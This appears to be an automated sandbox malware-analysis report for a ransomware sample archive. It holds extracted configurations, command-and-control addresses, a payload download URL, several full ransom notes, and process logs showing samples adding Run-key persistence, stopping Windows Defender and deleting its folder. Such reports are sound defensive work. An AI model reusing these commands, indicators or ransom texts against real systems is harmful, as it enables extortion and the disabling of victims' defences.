Analysis

  • max time kernel
    68s
  • max time network
    218s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2024 17:58

General

  • Target

    RNSM00450.7z

  • Size

    42.2MB

  • MD5

    bfd40652a6a56169533500d1f6725940

  • SHA1

    b070b8b7777b2c32965196aed7a47a3f2f7526a5

  • SHA256

    c90c7e54c06ebeb429bc6b61be52dc96134991f5100779c1357b50beffa3a756

  • SHA512

    60374aaecfdf66c68bb7e8f67285c84019792f4b16b3242a82de5e4d80fcf11878138e0e65a7b66a49cf7cc203e3445439b4a0c5a7c9f95481d7965e386f5804

  • SSDEEP

    786432:4l+NsvkAVmYGhyE4cFDaKpPNFoRHiOjOIaYyV//qiYBv4CVL4CQsRA9BYLfJ:hKvlm7yE4STPNFoRBjOIbyV/Ci+v4Ci6

Malware Config

Extracted

Path

C:\Recovery\read_me_lock.txt

Ransom Note
Hello dear user! Unfortunately, your files have been encrypted and attackers are taking over 1 TB of your personal data, financial reports and many other documents. Do not try to recover files yourself, you can damage them without special software. We can help you recover your files and prevent your data from leaking or being sold on the darknet. Just contact support using the following methods and we will decrypt one non-important file for free to convince you of our honesty. Contact us method below: Use TOR Browser: http://t532wrjittpwhxhlf356ie3ee3t5g2mnksaubovgdagsy72cu5nbxuad.onion/4e648ee1402bb2bc
URLs

http://t532wrjittpwhxhlf356ie3ee3t5g2mnksaubovgdagsy72cu5nbxuad.onion/4e648ee1402bb2bc

Extracted

Family

sodinokibi

Botnet

$2a$12$prOX/4eKl8zrpGSC5lnHPecevs5NOckOUW5r3s4JJYDnZZSghvBkq

Campaign

8254

Decoy

boisehosting.net

fotoideaymedia.es

dubnew.com

stallbyggen.se

koken-voor-baby.nl

juneauopioidworkgroup.org

vancouver-print.ca

zewatchers.com

bouquet-de-roses.com

seevilla-dr-sturm.at

olejack.ru

i-trust.dk

wasmachtmeinfonds.at

appsformacpc.com

friendsandbrgrs.com

thenewrejuveme.com

xn--singlebrsen-vergleich-nec.com

sabel-bf.com

seminoc.com

ceres.org.au

Attributes
  • net

    false

  • pid

    $2a$12$prOX/4eKl8zrpGSC5lnHPecevs5NOckOUW5r3s4JJYDnZZSghvBkq

  • prc

    encsvc

    powerpnt

    ocssd

    steam

    isqlplussvc

    outlook

    sql

    ocomm

    agntsvc

    mspub

    onenote

    winword

    thebat

    excel

    mydesktopqos

    ocautoupds

    thunderbird

    synctime

    infopath

    mydesktopservice

    firefox

    oracle

    sqbcoreservice

    dbeng50

    tbirdconfig

    msaccess

    visio

    dbsnmp

    wordpad

    xfssvccon

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [-] Whats HapPen? [-] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decoder.re/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    8254

  • svc

    veeam

    memtas

    sql

    backup

    vss

    sophos

    svc$

    mepocs

Extracted

Family

crimsonrat

C2

134.119.181.142

10.5.26.108

Extracted

Family

vidar

Version

39.4

Botnet

931

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    931

Extracted

Path

C:\Program Files\readme.txt

Family

conti

Ransom Note
All of your files are currently encrypted by CONTI strain. As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. You can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.best YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible. ---BEGIN ID--- dz0MK2yuqxgQB7sUx7heoZyiuK40XiAbhbP5thzZoDJRJAEahpKemj3x2BflDQ3I ---END ID---
URLs

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

https://contirecovery.best

Extracted

Path

C:\Recovery\readme.txt

Family

conti

Ransom Note
All of your files are currently encrypted by CONTI strain. As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. You can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.best YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible. ---BEGIN ID--- 7JgMvF9QMqzqzAZatFO55jNBP8vdYTOdLuzNUxNH7L1jCsqatJDGIbpLJIAdiumO ---END ID---
URLs

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

https://contirecovery.best

Extracted

Path

C:\Recovery\readme.txt

Family

conti

Ransom Note
All of your files are currently encrypted by CONTI strain. As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. You can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.icu/ YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible. ---BEGIN ID--- oELYlYt1w2UZdU24RwrJlJRz2vafqMds2VriDIO6EriCmzvrhcVLzHSPujhLRtQB ---END ID---
URLs

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

https://contirecovery.icu/

Extracted

Path

C:\Users\r9p1525r-readme.txt

Ransom Note
---=== Welcome. Again. ===--- [-] Whats HapPen? [-] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension r9p1525r. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8305E0107A7515E2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decoder.re/8305E0107A7515E2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: +S1YQYYrDrncRJ6HWhDUEbvWTNVL1RZj9K3nHHvSWdy81a6NxKOoHOzmq+Ar47U7 yem224JbXxaPkK1CaeNdUaa12xa61T7lXt/RDxDwCn8Z6ih5iKQnIqLcV74SkaXo PYwNFt4SFcyO8A2+8sQBeA/HMhjFeQIbKH/58JZwJANY13UKsN9iXNv6y92zXN4w h5TLIQx5EHn2Wz4TV08eTRM6YJ6FbfnSETT7ZKbeQ0pWedCPhM+ANbYdj3V6Kqrr kPMTN4U4wbUIVIuQy2kJJmor1LeO4z4XyBSgg2hk/DppdFkDZQgq8dnYgzNSae1U Tw/Kr6HBPwwEkG2ATtzH1WuOxfJ79+XRZxg/NyI4JK+2IOljp6fbSnla58TsbRHk fWzrWjaJ/OvJjHIRHLHQzXgYY+VLFc7n68jgZamFg8Z16RBATSDYZanVy0xeKJ/d XueRPMrgCRqOMMMeEXLIPmm/xvA9G5D27DmeidQ5im2IBN4xBC/HuHrrH7aApq8/ rxtcFUNyomM6ZJxyHXP2/ANgWF7DMMo0JDGry+ae75Roanh9AwROZBjN59zp983H R82KDSnMcn3p0QPawqdVeqpngP8b8rI4I1rSWe5ffMta+/jRncBgcPFckt033BdE wB41cTFoSKVC1BStmvOrPaEmU45atREObF+eemRy4s3biHr5onknm95D2UCTaTn+ rPMbdaGqde6LxraIhW2Oo0GqJAbcz6IP/iBWFi7Tms6dVKG8czjxGYYfOQiJ0mXY K04RIMA0FuhnDA9uxD0keHJXpfkbNzpOmjhpK+9terAHNDrfO/mpPcSgp2rE1d1K AnnI8P4suqkJvzrQr01imYvYXwHltu0QVJS8BxhreCQu8D4VGNGqawebWIRbIce6 pNtFQa08Fymbb7T4nw9C4GIjO2tyqT4M745hKIv9GkTMbzfP9cms+XhTLKGzOQMI 2eQbghJZqg8cY/93TuFeySpSx8t6/RTSINR7Dn/HmOjwbV/ORJ6+ul+U48zFVP/Z Fj6zLyo5lmU6LhbVmp9DWCPWym209fRvGBse7HpdmoWuYIEFi8CDSRPtyNMn7jmA viTrfBgYJuT8cyFm2FrhI7AN6pauVypVX8QRwPDLOkSUHQvRvRYXUab14XzVA61w EUXzgOPyDBqLOncBg7ZZawVCYnkLR4B86jXgM7Ez+/VcqH7hPqIwZsDuiiTgd6tA Zmux1T+jucAeBbSIOdDNOrm8seoUXIRIksLcaWvth5nwpBn4vFsxJtniKr3Jc0z1 Sa1FupTtjZLIcjlT1PPJ3RugNbZkvWNmwsIciBtH+uf+KDa2O2axSYuL4KzW7+4b zoSwDqGm22T0iwd8oEE7i0A5f3ru1UODM1cIz9nqETk= ----------------------------------------------------------------------------------------- !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8305E0107A7515E2

http://decoder.re/8305E0107A7515E2

Extracted

Path

C:\Users\readme.txt

Family

conti

Ransom Note
All of your files are currently encrypted by CONTI strain. As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. You can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.top YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible. ---BEGIN ID--- cnxUZFg6NAi31LVHmHIEOjAUGxbCfnw6nFXLVywSJeUDFLkZ1Ket5UoxpcA98It8 ---END ID---
URLs

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

https://contirecovery.top

Extracted

Path

C:\Program Files\readme.txt

Family

conti

Ransom Note
All of your files are currently encrypted by CONTI strain. As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. You can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.best YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible. ---BEGIN ID--- nAkBjF6vE8MXJ5872zt7dHDLV8WmUzcubRMKd2uINBb6qZMvszxzA5B7W5J0Tss0 ---END ID---
URLs

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

https://contirecovery.best

Extracted

Family

djvu

C2

http://astdg.top/nddddhsspen6/get.php

Attributes
  • extension

    .zzla

  • offline_id

    nZH1798DvPbIMQmK7lZZDSpe81UIFzsEMm3NtJt1

  • payload_url

    http://dgos.top/dl/build2.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-mNr1oio2P6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0314ewgfDd

rsa_pubkey.plain

Extracted

Family

redline

Botnet

terrornax

C2

45.88.3.176:17033

Signatures

  • Conti Ransomware

    Ransomware generally thought to be a successor to Ryuk.

  • CrimsonRat

    Crimson RAT is a malware linked to a Pakistani-linked threat actor.

  • Detect ZGRat V2 2 IoCs
  • Detected Djvu ransomware 2 IoCs
  • Disables service(s) 3 TTPs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Vidar Stealer 1 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 31 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 45 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 16 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 9 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 46 IoCs
  • Kills process with taskkill 44 IoCs
  • Modifies data under HKEY_USERS 24 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00450.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1736
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3896
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3468
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3116
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2580
      • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Agent.gen-7431f66d89ea92fb18a3fb489b71417672d15e6140e66062912c38138b2a8c55.exe
        HEUR-Trojan-Ransom.MSIL.Agent.gen-7431f66d89ea92fb18a3fb489b71417672d15e6140e66062912c38138b2a8c55.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4164
      • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-06207f1f13af1dbbc3de612d1e031437f9f5aefbfdb989d68f52a193405cb160.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-06207f1f13af1dbbc3de612d1e031437f9f5aefbfdb989d68f52a193405cb160.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:392
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "RFQ" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\RFQ.exe"
          4⤵
            PID:5464
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "RFQ" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\RFQ.exe"
              5⤵
                PID:6000
            • C:\Users\Admin\AppData\Roaming\RFQ.exe
              "C:\Users\Admin\AppData\Roaming\RFQ.exe"
              4⤵
                PID:8168
            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-1c0edaf81b38ce528d2720863e8316306875941eae58da12f963c20ef9276b30.exe
              HEUR-Trojan-Ransom.MSIL.Blocker.gen-1c0edaf81b38ce528d2720863e8316306875941eae58da12f963c20ef9276b30.exe
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1132
            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-36355464c361c0e2caa14c517de97291a9bc6707acda3bbd34a30aa45e55c5b2.exe
              HEUR-Trojan-Ransom.MSIL.Blocker.gen-36355464c361c0e2caa14c517de97291a9bc6707acda3bbd34a30aa45e55c5b2.exe
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:4792
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "RFQ" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\RFQ.exe"
                4⤵
                  PID:4324
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "RFQ" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\RFQ.exe"
                    5⤵
                      PID:6080
                  • C:\Users\Admin\AppData\Roaming\RFQ.exe
                    "C:\Users\Admin\AppData\Roaming\RFQ.exe"
                    4⤵
                      PID:448
                      • C:\Users\Admin\AppData\Roaming\RFQ.exe
                        "C:\Users\Admin\AppData\Roaming\RFQ.exe"
                        5⤵
                          PID:2676
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 184
                            6⤵
                            • Program crash
                            PID:10184
                    • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exe
                      HEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exe
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:5116
                      • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exe
                        C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3faaf8a467e00d500ef4345a6676b14d71c687cbb43eec700ec3dbc2fcbaa266.exe
                        4⤵
                          PID:5544
                          • C:\Users\Admin\AppData\Local\systemaltan.exe
                            "C:\Users\Admin\AppData\Local\systemaltan.exe"
                            5⤵
                              PID:7156
                        • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5a4aab0cd8f0b345d8c07ff690a7b038ed23d6bd5587360e0c17c22d9bf0f70f.exe
                          HEUR-Trojan-Ransom.MSIL.Blocker.gen-5a4aab0cd8f0b345d8c07ff690a7b038ed23d6bd5587360e0c17c22d9bf0f70f.exe
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:4624
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 1136
                            4⤵
                            • Program crash
                            PID:804
                        • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-78f124b7a00d29a4573c261f1ef8be979ce46c347371365ba820ba5750422f88.exe
                          HEUR-Trojan-Ransom.MSIL.Blocker.gen-78f124b7a00d29a4573c261f1ef8be979ce46c347371365ba820ba5750422f88.exe
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • System Location Discovery: System Language Discovery
                          PID:1412
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            4⤵
                              PID:3300
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              4⤵
                                PID:6584
                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-da4b4dd47271515cd6569e478a8a64369d5b60be78a7ff89bd885fcd98464349.exe
                              HEUR-Trojan-Ransom.MSIL.Blocker.gen-da4b4dd47271515cd6569e478a8a64369d5b60be78a7ff89bd885fcd98464349.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4080
                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Blocker.gen-dbc9ca213f978c5cd8574d52088a9edfa09432fd760adb7736fc6bf04e531c82.exe
                              HEUR-Trojan-Ransom.MSIL.Blocker.gen-dbc9ca213f978c5cd8574d52088a9edfa09432fd760adb7736fc6bf04e531c82.exe
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3924
                              • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
                                "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
                                4⤵
                                • Access Token Manipulation: Create Process with Token
                                PID:5512
                                • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
                                  "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 5512
                                  5⤵
                                    PID:6952
                                • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
                                  "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
                                  4⤵
                                  • Access Token Manipulation: Create Process with Token
                                  PID:6772
                                  • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
                                    "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 6772
                                    5⤵
                                      PID:10028
                                  • C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
                                    C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
                                    4⤵
                                      PID:6420
                                  • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Foreign.gen-ae25edc0d1d6f7e83eee6a9a28a80c1a6833405459a7ea98bf7ce1c1ada86843.exe
                                    HEUR-Trojan-Ransom.MSIL.Foreign.gen-ae25edc0d1d6f7e83eee6a9a28a80c1a6833405459a7ea98bf7ce1c1ada86843.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:1080
                                    • C:\ProgramData\MediaPlayer\irvrmjavhica.exe
                                      "C:\ProgramData\MediaPlayer\irvrmjavhica.exe"
                                      4⤵
                                        PID:5636
                                    • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe
                                      HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe
                                      3⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3932
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        "taskkill" /F /IM RaccineSettings.exe
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5328
                                      • C:\Windows\SysWOW64\reg.exe
                                        "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
                                        4⤵
                                          PID:5704
                                        • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
